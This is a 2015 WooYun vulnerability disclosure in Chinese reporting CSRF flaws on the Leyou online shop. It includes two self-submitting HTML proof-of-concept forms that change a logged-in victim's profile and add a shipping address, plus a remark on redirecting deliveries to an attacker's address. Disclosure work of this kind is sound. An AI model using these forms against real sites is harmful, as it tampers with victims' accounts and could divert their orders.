当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122927

漏洞标题:乐友网上商城可CSRF修改他人资料、收货地址

相关厂商:乐友

漏洞作者: jeary

提交时间:2015-06-26 16:10

修复时间:2015-07-01 16:12

公开时间:2015-07-01 16:12

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-26: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

~~

详细说明:

POC(修改资料):

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://www.leyou.com.cn/user/leyou/ManageInfo.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="nick" value="jearyxxxx" />
<input type="hidden" name="email" value="root&#64;jeary&#46;org" />
<input type="hidden" name="code" value="&#13;" />
<input type="hidden" name="baby&#95;name" value="test" />
<input type="hidden" name="gender" value="m" />
<input type="hidden" name="year" value="2009" />
<input type="hidden" name="month" value="1" />
<input type="hidden" name="day" value="1" />
<input type="hidden" name="sbmtMod" value="¨¨&#183;¨¨?¨¬¨¢&#189;&#187;" />
<input type="hidden" name="ulogin" value="&#13;" />
<input type="hidden" name="y" value="&#13;" />
<input type="hidden" name="m" value="&#13;" />
<input type="hidden" name="d" value="&#13;" />

</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
POC2(收货地址):
<code>
<html>
<body>
<form action="http://www.leyou.com.cn/user/leyou/sub_user_address.php" method="POST">
<input type="hidden" name="revname" value="test" />
<input type="hidden" name="addr" value="å&#147;&#146;å&#147;&#146;å&#147;&#146;å&#147;&#146;å&#147;&#146;å&#147;&#146;" />
<input type="hidden" name="zip" value="000000" />
<input type="hidden" name="phone" value="13300001111" />
<input type="hidden" name="zuoji" value="072233332222" />
<input type="hidden" name="areaid" value="820100" />
<input type="hidden" name="province" value="é&#166;&#153;æ&#184;&#175;ç&#137;&#185;å&#140;º" />
<input type="hidden" name="city" value="é&#166;&#153;æ&#184;&#175;å&#178;&#155;" />
<input type="hidden" name="area" value="æ&#190;&#179;é&#151;&#168;å&#141;&#138;å&#178;&#155;" />
<input type="hidden" name="aORu" value="insert" />
<input type="hidden" name="name" value="name" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>


PS:设为默认地址有一个userid和aid,如果能得到这两个,或许能把自己的地址设为默认然后发货就发到恶意修改的地址了.

漏洞证明:

登录状态下访问POC即可.
地址POC虽然返回false,但是请求成功。

修复方案:

token

版权声明:转载请注明来源 jeary@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-01 16:12

厂商回复:

漏洞Rank:2 (WooYun评价)

最新状态:

暂无